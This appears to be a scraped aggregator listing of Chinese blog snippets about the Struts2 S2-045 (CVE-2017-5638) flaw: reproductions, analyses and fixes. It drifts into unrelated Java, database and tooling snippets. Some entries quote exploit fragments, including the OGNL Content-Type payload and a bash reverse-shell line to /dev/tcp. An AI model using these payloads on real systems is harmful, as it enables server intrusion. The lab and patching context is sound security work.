- Struts2 S2-045漏洞复现
你能拿我咋的
渗透测试漏洞复现strutsjavaweb安全
1.漏洞概述OGNL是ObjectGraphicNavigationLanguage(对象图导航语言)的缩写,它是一个开源项目。Struts框架使用OGNL作为默认的表达式语言。struts2的rce本质都是一样的(除了S2-052以外),都是Struts2框架执行了恶意用户传进来的OGNL表达式,造成远程代码执行。可以造成“命令执行、服务器文件操作、打印回显、获取系统属性、危险代码执行”等,只不
- s2-045 java_Struts2远程代码执行漏洞S2-045利用及修复
巴尔莫斯
s2-045java
#!/usr/bin/envpython#encoding:utf-8importurllib2importsysfromposter.encodeimportmultipart_encodefromposter.streaminghttpimportregister_openersdefpoc():register_openers()datagen,header=multipart_encode
- [ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-045(CVE-2017-5638)
_PowerShell
vulhub渗透测试自学篇vulhub漏洞复现struts2远程代码执行s2-045CVE-2017-5638
博主介绍博主介绍:大家好,我是_PowerShell,很高兴认识大家~✨主攻领域:【渗透领域】【数据通信】【通讯安全】【web安全】【面试分析】点赞➕评论➕收藏==养成习惯(一键三连)欢迎关注一起学习一起讨论⭐️一起进步文末有彩蛋作者水平有限,欢迎各位大佬指点,相互学习进步!文章目录博主介绍一、漏洞编号二、影响范围三、漏洞描述四、环境搭建1、进入s2-045环境2、启动s2-045环境3、查看s
- Struts2 __ S2-045 Remote Code Execution Vulnerablity __ CVE-2017-5638
cgjil
漏洞复现struts
Struts2__S2-045RemoteCodeExecutionVulnerablity__CVE-2017-5638说明内容漏洞编号CVE-2017-5638漏洞名称S2-045RemoteCodeExecutionVulnerablity影响范围Struts2.3.5-Struts2.3.31,Struts2.5-Struts2.5.10漏洞描述pacheStruts2的JakartaMu
- Weblogic(CVE-2017-10271)与 Struts2(s2-045) 反序列化漏洞复现
mpig
strutsjava后端网络安全运维安全
文章目录Java反序列化漏洞复现weblogic环境搭建漏洞复现Struts2(s2-045)环境搭建漏洞复现**漏洞利用**Java反序列化漏洞复现weblogicWeblogic/bin/bash-cbash-i>&/dev/tcp/10.9.75.58/210>&1成功获取shell:Struts2(s2-045)S2-045RemoteCodeExecution
- Struts2漏洞利用工具exp-golang
那个晓文
使用方法:system@mac:~/golang/src/s2-045$./mainhttp://xxx.com/1.jspifconfig200map[Server:[Apache-Coyote/1.1]Date:[Tue,21Mar201706:08:39GMT]]eth0Linkencap:EthernetHWaddr52:54:E4:D1:15:00inetaddr:192.168.1.8
- Struts2漏洞利用检测框架
vul404
代码是去年十月份写的,存于硬盘几月矣。1、整体代码结构参照Empire框架,对于每个漏洞利用都有相对应的模块,方便修改扩展2、主要集成了struts2漏洞中的s2-013、s2-016、s2-019、s2-032、s2-037、s2-045、s2-046、s2-052、s2-devMode利用检测模块3、Payload数据传输base64加密4、漏洞主要功能分为检测和利用,可以参照以下图片示例进行
- 漏洞复现 - - -Struts2(s2-045)远程命令执行漏洞
干掉芹菜
#经典漏洞复现网安strutsservletjava网络
一,Struts2是什么Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。Struts2是Struts的下一代产品,是在struts1和WebWork的技术基础上进行了合并的全新的Struts2框架。其全新的Struts2的体系结构与Struts1的体系结构差别巨
- s2-045 java_S2-045漏洞初步分析
weixin_39614831
s2-045java
0x01前言前几天刚分析完s2-032这个漏洞,今天又爆发了一个s2-045的漏洞,又是直接的命令执行,影响了struts2绝大多数的版本.官方给的漏洞公告在这里https://cwiki.apache.org/confluence/display/WW/S2-045受影响版本:Struts2.3.5-Struts2.3.31,Struts2.5-Struts2.5.10其实昨天就看到朋友圈有人在
- 远程命令执行与反序列化之——Struts框架全系列命令执行漏洞还原
温柔小薛
web渗透测试与代码审计#+远程命令执行与反序列化漏洞#+中间件漏洞与框架漏洞安全
Struts框架全系列命令执行漏洞还原(端口默认8080)历史漏洞:https://www.seebug.org/search/?keywords=struts2s2早期综合利用工具(10-17年高危漏洞)K8struts2EXP填写目标,可以执行命令,文件上传(小马),连接小马出现.action或者.do都可能是使用structs2框架s2-045漏洞还原(K8就可以)http://192.16
- 渗透靶场--vulnstack-红队评估实战(4)
6right
渗透靶场渗透测试
vulnstack-红队评估实战(4)环境配置web服务器ubuntu:ubuntu内网192.168.183.131外网192.168.154.137web服务需要自己启动分别为s2-045、CVE-2017-12615、cve-2018-12613sudosuubuntucd/home/ubuntu/Desktop/vulhub/struts2/s2-045docker-composeup域成
- s2-045漏洞的复现及其修复
此间不留白
0x00漏洞概述漏洞介绍ApacheStruts2被曝存在远程命令执行漏洞,漏洞编号S2-045,CVE编号CVE-2017-5638,在使用基于Jakarta插件的文件上传功能时,有可能存在远程命令执行,导致系统被黑客入侵。恶意用户可在上传文件时通过修改HTTP请求头中的Content-Type值来触发该漏洞,进而执行系统命令。影响范围Struts2.3.5–Struts2.3.31Struts
- Struts2 远程代码执行漏洞(S2-046)漏洞复现
陌小皓
漏洞复现继3月7日爆发的S2-045远程命令执行漏洞风波之后,今日Struts2官方发布另一个高危漏洞S2-046,CVE编号依然是CVE-2017-5638,据官方披露,最新的漏洞与S2-045类似,只是攻击字段发生变化。修复方案依然与S2-045相同,升级至2.3.32或者2.5.10.1版本即可防御针对这两个漏洞攻击。S2-046Struts2是一个基于MVC设计模式的Web应用框架,它本质
- 9.漏洞验证系列--Apache Struts2 远程命令执行(S2-045)
HNorth_Hill
网络安全
本系列文章旨在对于有一定网络安全基础的人员,在日常工作中扫描出来的各种漏洞,如何进行验证,以区分该漏洞是否存在或是扫描器误报。请勿应用非法途径。网络上有很多现成的st2的检测工具,如K8、鬼哥编写的。基本步骤大致如下填入漏洞链接,选择相应的st2漏洞编号,点击获取信息,或者切换到执行命令选项卡,能获取到不一样的信息,或者能成功执行命令,即为存在漏洞
- 【S2-045】 Struts2远程命令执行漏洞(CVE-2017-5638)
Jaychouzz_k
实验环境操作机:WindowsXP目标机:Centos6.5Struts版本:2.3.31请访问http://file.ichunqiu.com/74tk6wy6下载实验文件实验目的:了解S2-045Struts2远程命令执行漏洞危害掌握检测修复S2-045Struts2远程命令执行漏洞技术实验文件:poc.exe:本次实验漏洞验证的POC源码SecurityFilter.class:本次实验漏洞
- S2-045漏洞之简单分析+实战
BlingSmile
web安全strutss2-045
0X00前言:尽管s2-045的poc已经烂大街了,博主只是想学习了解一下它的用法,顺带写了一个测试小工具。0x01漏洞简介ApacheStruts是一套用于创建企业级JavaWeb应用的开源MVC框架。ApacheStruts2.3.5–2.3.31版本及2.5–2.5.10版本存在远程代码执行漏洞(CNNVD-201703-152,CVE-2017-5638)。该漏洞是由于上传功能的异常处理函
- struts2 S2-045问题,升级struts版本的解决方案
qq_29961189
这两天网上爆出struts2S2-045问题,因为我负责的项目中也用到了,所以我对自己解决方案进行总结。一、漏洞情况分析Struts2是第二代基于Model-View-Controller(MVC)模型的java企业级web应用框架,并成为当时国内外较为流行的容器软件中间件。jakarta是apache组织下的一套Java解决方案的开源软件的名称,包括很多子项目。Struts就是jakarta的紧
- S2-045
g0
POC#coding:utf-8importurllib2fromTkinterimport*importsysfromposter.encodeimportmultipart_encodefromposter.streaminghttpimportregister_openersclassSTART():def__init__(self,root):self.root=rootself.show
- 升级Struts2 2.3.15.1升级到2.3.32
z2011like1
由于struts2漏洞升级原来升级到2.3..28.1文件记载的很多东西都已丢失,最近内网的一个服务器需要公布到外网上,正好又遇到了S2-045漏洞。以前记载的东西都已丢失。所以在网上开记载。同时和大家分享。升级到2.3..28.1基本替换的架包xwork-core-2.3.28.1.jar;struts2-json-plugin-2.3.28.1.jar;struts2-convention-p
- struts2 s2-045漏洞检测 &临时解决方案
TUDP
web
struts2漏洞检测代码(文件上传代码和exce命令来均自网络懒得自己写)publicstaticStringupload(Stringurl,StringfilePath){StringfdfsPath="";try{DefaultHttpClienthttpclient=newDefaultHttpClient();HttpPosthttppost=newHttpPost(url);File
- S2-045远程代码执行漏洞
tdcoming
漏洞利用
ApacheStruts2被曝存在远程命令执行漏洞,漏洞编号S2-045,CVE编号CVE-2017-5638,在使用基于Jakarta插件的文件上传功能时,有可能存在远程命令执行,导致系统被黑客入侵。恶意用户可在上传文件时通过修改HTTP请求头中的Content-Type值来触发该漏洞,进而执行系统命令。影响范围Struts2.3.5–Struts2.3.31Struts2.5–Struts2.
- struts2的漏洞
杨航JAVA
文章前半部分来自团队小伙伴阿德马的总结,后半部分的Poc和Exp是小编匆忙之际借鉴而来,感谢写Poc和Exp的伙伴~安恒给官方上报的,然后官方选择了1个对国内来说比较敏感的时期发了公告出来,好蛋疼。该漏洞的CVE编号是CVE-2017-5638(s2-045),攻击者利用该漏洞可以进行远程命令执行,从而获取更高的服务器权限。漏洞描述:查了点资料,发现跟struts2配置中struts.multip
- Struts2远程命令执行漏洞 S2-045 源码分析
raintungli
攻击与防护JVM源码分析IP/TCPJVM源码分析
Struts2又爆OGNL的高危漏洞S-045,又是OGNL的漏洞漏洞分析1.Struts的上传request在上传文件里,Struts默认使用的是commonupload的上传组件,为了能被action访问到上传的文件,通常会重新封装request,Spring也是这么做。JakartaStreamMultiPartRequest.java中publicvoidparse(HttpServlet
- Struts 2 S2-045 Jakarta插件远程代码执行漏洞加固方法
江湖之笑
Java_MVC
近日,安恒信息安全研究院WEBIN实验室高级安全研究员nike.zheng发现著名J2EE框架-Struts2存在远程代码执行的严重漏洞。漏洞编号:S2-045,CVE-2017-5638漏洞名称:基于Jakartaplugin插件的Struts远程代码执行漏洞官方评级:高危漏洞描述:ApacheStruts2被曝出存在远程命令执行漏洞,漏洞编号S2-045,CVE编号CVE-2017-5638,
- exploit - CVE-2017-5638 - Apache Struts2 S2-045
Nixawk
VulnerabilityAnalysisexploit
Metasploit-FrameworkExpCode#!/usr/bin/python#-*-coding:utf-8-*-importurllib2importhttplibdefexploit(url,cmd):payload="%{(#_='multipart/form-data')."payload+="(#
[email protected]@DEFAULT_MEMBER_ACCE
- struts2 S2-045漏洞
qzxdh
Safe
ApacheStruts2被曝存在远程命令执行漏洞,漏洞编号S2-045,CVE编号CVE-2017-5638,在使用基于Jakarta插件的文件上传功能时,有可能存在远程命令执行,导致系统被黑客入侵。漏洞编号:CVE-2017-5638漏洞名称:基于Jakartaplugin插件的Struts远程代码执行漏洞官方评级:高危漏洞描述:恶意用户可在上传文件时通过修改HTTP请求头中的Content-
- Struts2 S2-045 漏洞触发流程不严谨推测
s1mba
Web安全
//根据已有的一些信息和修复版本的代码,推测应该是如下的触发流程//因为没有测试环境,也只是不严谨的代码触发流程推测,不保证正确性,欢迎大神交流分享。//core\src\main\java\org\apache\struts2\dispatcher\multipart\JakartaMultiPartRequest.javapublicvoidparse(HttpServletRequestre
- Apache Struts2(S2-045)漏洞利用
煜铭2011
strutsstruts2.0漏洞S2-045
0x00前言ApacheStruts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目,是一套用于创建企业级JavaWeb应用的开源MVC框架,主要提供两个版本框架产品:Struts1和Struts2。Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。S
- struts2 s2-045漏洞利用poc
isinstance
安全
直接上代码了亲测有用第一个是检测有没有这个漏洞的importrequestsimportsysdefpoc(url):payload="%{(#test='multipart/form-data').(#
[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#con
- struts2漏洞s2-045漏洞利用测试
luffy5459
java
s2-045漏洞是一个可以执行远程命令的漏洞,该漏洞是struts2上传文件使用参数struts.multipart.parser=jakarta,并且文件上传采用了commons-fileupload的api导致的。只是使用struts.multipart.parser=jakarta并不能导致这个问题,需要在请求时,请求头使用Content-Type参数,这个参数必须带上一串奇怪的ognl表达
- 用MiddleGenIDE工具生成hibernate的POJO(根据数据表生成POJO类)
AdyZhang
POJOeclipseHibernateMiddleGenIDE
推荐:MiddlegenIDE插件, 是一个Eclipse 插件. 用它可以直接连接到数据库, 根据表按照一定的HIBERNATE规则作出BEAN和对应的XML ,用完后你可以手动删除它加载的JAR包和XML文件! 今天开始试着使用
- .9.png
Cb123456
android
“点九”是andriod平台的应用软件开发里的一种特殊的图片形式,文件扩展名为:.9.png
智能手机中有自动横屏的功能,同一幅界面会在随着手机(或平板电脑)中的方向传感器的参数不同而改变显示的方向,在界面改变方向后,界面上的图形会因为长宽的变化而产生拉伸,造成图形的失真变形。
我们都知道android平台有多种不同的分辨率,很多控件的切图文件在被放大拉伸后,边
- 算法的效率
天子之骄
算法效率复杂度最坏情况运行时间大O阶平均情况运行时间
算法的效率
效率是速度和空间消耗的度量。集中考虑程序的速度,也称运行时间或执行时间,用复杂度的阶(O)这一标准来衡量。空间的消耗或需求也可以用大O表示,而且它总是小于或等于时间需求。
以下是我的学习笔记:
1.求值与霍纳法则,即为秦九韶公式。
2.测定运行时间的最可靠方法是计数对运行时间有贡献的基本操作的执行次数。运行时间与这个计数成正比。
- java数据结构
何必如此
java数据结构
Java 数据结构
Java工具包提供了强大的数据结构。在Java中的数据结构主要包括以下几种接口和类:
枚举(Enumeration)
位集合(BitSet)
向量(Vector)
栈(Stack)
字典(Dictionary)
哈希表(Hashtable)
属性(Properties)
以上这些类是传统遗留的,在Java2中引入了一种新的框架-集合框架(Collect
- MybatisHelloWorld
3213213333332132
//测试入口TestMyBatis
package com.base.helloworld.test;
import java.io.IOException;
import org.apache.ibatis.io.Resources;
import org.apache.ibatis.session.SqlSession;
import org.apache.ibat
- Java|urlrewrite|URL重写|多个参数
7454103
javaxmlWeb工作
个人工作经验! 如有不当之处,敬请指点
1.0 web -info 目录下建立 urlrewrite.xml 文件 类似如下:
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE u
- 达梦数据库+ibatis
darkranger
sqlmysqlibatisSQL Server
--插入数据方面
如果您需要数据库自增...
那么在插入的时候不需要指定自增列.
如果想自己指定ID列的值, 那么要设置
set identity_insert 数据库名.模式名.表名;
----然后插入数据;
example:
create table zhabei.test(
id bigint identity(1,1) primary key,
nam
- XML 解析 四种方式
aijuans
android
XML现在已经成为一种通用的数据交换格式,平台的无关性使得很多场合都需要用到XML。本文将详细介绍用Java解析XML的四种方法。
XML现在已经成为一种通用的数据交换格式,它的平台无关性,语言无关性,系统无关性,给数据集成与交互带来了极大的方便。对于XML本身的语法知识与技术细节,需要阅读相关的技术文献,这里面包括的内容有DOM(Document Object
- spring中配置文件占位符的使用
avords
1.类
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE beans PUBLIC "-//SPRING//DTD BEAN//EN" "http://www.springframework.o
- 前端工程化-公共模块的依赖和常用的工作流
bee1314
webpack
题记: 一个人的项目,还有工程化的问题嘛? 我们在推进模块化和组件化的过程中,肯定会不断的沉淀出我们项目的模块和组件。对于这些沉淀出的模块和组件怎么管理?另外怎么依赖也是个问题? 你真的想这样嘛? var BreadCrumb = require(‘../../../../uikit/breadcrumb’); //真心ugly。
- 上司说「看你每天准时下班就知道你工作量不饱和」,该如何回应?
bijian1013
项目管理沟通IT职业规划
问题:上司说「看你每天准时下班就知道你工作量不饱和」,如何回应
正常下班时间6点,只要是6点半前下班的,上司都认为没有加班。
Eno-Bea回答,注重感受,不一定是别人的
虽然我不知道你具体从事什么工作与职业,但是我大概猜测,你是从事一项不太容易出现阶段性成果的工作
- TortoiseSVN,过滤文件
征客丶
SVN
环境:
TortoiseSVN 1.8
配置:
在文件夹空白处右键
选择 TortoiseSVN -> Settings
在 Global ignote pattern 中添加要过滤的文件:
多类型用英文空格分开
*name : 过滤所有名称为 name 的文件或文件夹
*.name : 过滤所有后缀为 name 的文件或文件夹
--------
- 【Flume二】HDFS sink细说
bit1129
Flume
1. Flume配置
a1.sources=r1
a1.channels=c1
a1.sinks=k1
###Flume负责启动44444端口
a1.sources.r1.type=avro
a1.sources.r1.bind=0.0.0.0
a1.sources.r1.port=44444
a1.sources.r1.chan
- The Eight Myths of Erlang Performance
bookjovi
erlang
erlang有一篇guide很有意思: http://www.erlang.org/doc/efficiency_guide
里面有个The Eight Myths of Erlang Performance: http://www.erlang.org/doc/efficiency_guide/myths.html
Myth: Funs are sl
- java多线程网络传输文件(非同步)-2008-08-17
ljy325
java多线程socket
利用 Socket 套接字进行面向连接通信的编程。客户端读取本地文件并发送;服务器接收文件并保存到本地文件系统中。
使用说明:请将TransferClient, TransferServer, TempFile三个类编译,他们的类包是FileServer.
客户端:
修改TransferClient: serPort, serIP, filePath, blockNum,的值来符合您机器的系
- 读《研磨设计模式》-代码笔记-模板方法模式
bylijinnan
java设计模式
声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
- 配置心得
chenyu19891124
配置
时间就这样不知不觉的走过了一个春夏秋冬,转眼间来公司已经一年了,感觉时间过的很快,时间老人总是这样不停走,从来没停歇过。
作为一名新手的配置管理员,刚开始真的是对配置管理是一点不懂,就只听说咱们公司配置主要是负责升级,而具体该怎么做却一点都不了解。经过老员工的一点点讲解,慢慢的对配置有了初步了解,对自己所在的岗位也慢慢的了解。
做了一年的配置管理给自总结下:
1.改变
从一个以前对配置毫无
- 对“带条件选择的并行汇聚路由问题”的再思考
comsci
算法工作软件测试嵌入式领域模型
2008年上半年,我在设计并开发基于”JWFD流程系统“的商业化改进型引擎的时候,由于采用了新的嵌入式公式模块而导致出现“带条件选择的并行汇聚路由问题”(请参考2009-02-27博文),当时对这个问题的解决办法是采用基于拓扑结构的处理思想,对汇聚点的实际前驱分支节点通过算法预测出来,然后进行处理,简单的说就是找到造成这个汇聚模型的分支起点,对这个起始分支节点实际走的路径数进行计算,然后把这个实际
- Oracle 10g 的clusterware 32位 下载地址
daizj
oracle
Oracle 10g 的clusterware 32位 下载地址
http://pan.baidu.com/share/link?shareid=531580&uk=421021908
http://pan.baidu.com/share/link?shareid=137223&uk=321552738
http://pan.baidu.com/share/l
- 非常好的介绍:Linux定时执行工具cron
dongwei_6688
linux
Linux经过十多年的发展,很多用户都很了解Linux了,这里介绍一下Linux下cron的理解,和大家讨论讨论。cron是一个Linux 定时执行工具,可以在无需人工干预的情况下运行作业,本文档不讲cron实现原理,主要讲一下Linux定时执行工具cron的具体使用及简单介绍。
新增调度任务推荐使用crontab -e命令添加自定义的任务(编辑的是/var/spool/cron下对应用户的cr
- Yii assets目录生成及修改
dcj3sjt126com
yii
assets的作用是方便模块化,插件化的,一般来说出于安全原因不允许通过url访问protected下面的文件,但是我们又希望将module单独出来,所以需要使用发布,即将一个目录下的文件复制一份到assets下面方便通过url访问。
assets设置对应的方法位置 \framework\web\CAssetManager.php
assets配置方法 在m
- mac工作软件推荐
dcj3sjt126com
mac
mac上的Terminal + bash + screen组合现在已经非常好用了,但是还是经不起iterm+zsh+tmux的冲击。在同事的强烈推荐下,趁着升级mac系统的机会,顺便也切换到iterm+zsh+tmux的环境下了。
我为什么要要iterm2
切换过来也是脑袋一热的冲动,我也调查过一些资料,看了下iterm的一些优点:
* 兼容性好,远程服务器 vi 什么的低版本能很好兼
- Memcached(三)、封装Memcached和Ehcache
frank1234
memcachedehcachespring ioc
本文对Ehcache和Memcached进行了简单的封装,这样对于客户端程序无需了解ehcache和memcached的差异,仅需要配置缓存的Provider类就可以在二者之间进行切换,Provider实现类通过Spring IoC注入。
cache.xml
<?xml version="1.0" encoding="UTF-8"?>
- Remove Duplicates from Sorted List II
hcx2013
remove
Given a sorted linked list, delete all nodes that have duplicate numbers, leaving only distinct numbers from the original list.
For example,Given 1->2->3->3->4->4->5,
- Spring4新特性——注解、脚本、任务、MVC等其他特性改进
jinnianshilongnian
spring4
Spring4新特性——泛型限定式依赖注入
Spring4新特性——核心容器的其他改进
Spring4新特性——Web开发的增强
Spring4新特性——集成Bean Validation 1.1(JSR-349)到SpringMVC
Spring4新特性——Groovy Bean定义DSL
Spring4新特性——更好的Java泛型操作API
Spring4新
- MySQL安装文档
liyong0802
mysql
工作中用到的MySQL可能安装在两种操作系统中,即Windows系统和Linux系统。以Linux系统中情况居多。
安装在Windows系统时与其它Windows应用程序相同按照安装向导一直下一步就即,这里就不具体介绍,本文档只介绍Linux系统下MySQL的安装步骤。
Linux系统下安装MySQL分为三种:RPM包安装、二进制包安装和源码包安装。二
- 使用VS2010构建HotSpot工程
p2p2500
HotSpotOpenJDKVS2010
1. 下载OpenJDK7的源码:
http://download.java.net/openjdk/jdk7
http://download.java.net/openjdk/
2. 环境配置
▶
- Oracle实用功能之分组后列合并
seandeng888
oracle分组实用功能合并
1 实例解析
由于业务需求需要对表中的数据进行分组后进行合并的处理,鉴于Oracle10g没有现成的函数实现该功能,且该功能如若用JAVA代码实现会比较复杂,因此,特将SQL语言的实现方式分享出来,希望对大家有所帮助。如下:
表test 数据如下:
ID,SUBJECTCODE,DIMCODE,VALUE
1&nbs
- Java定时任务注解方式实现
tuoni
javaspringjvmxmljni
Spring 注解的定时任务,有如下两种方式:
第一种:
<?xml version="1.0" encoding="UTF-8"?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http
- 11大Java开源中文分词器的使用方法和分词效果对比
yangshangchuan
word分词器ansj分词器Stanford分词器FudanNLP分词器HanLP分词器
本文的目标有两个:
1、学会使用11大Java开源中文分词器
2、对比分析11大Java开源中文分词器的分词效果
本文给出了11大Java开源中文分词的使用方法以及分词结果对比代码,至于效果哪个好,那要用的人结合自己的应用场景自己来判断。
11大Java开源中文分词器,不同的分词器有不同的用法,定义的接口也不一样,我们先定义一个统一的接口:
/**
* 获取文本的所有分词结果, 对比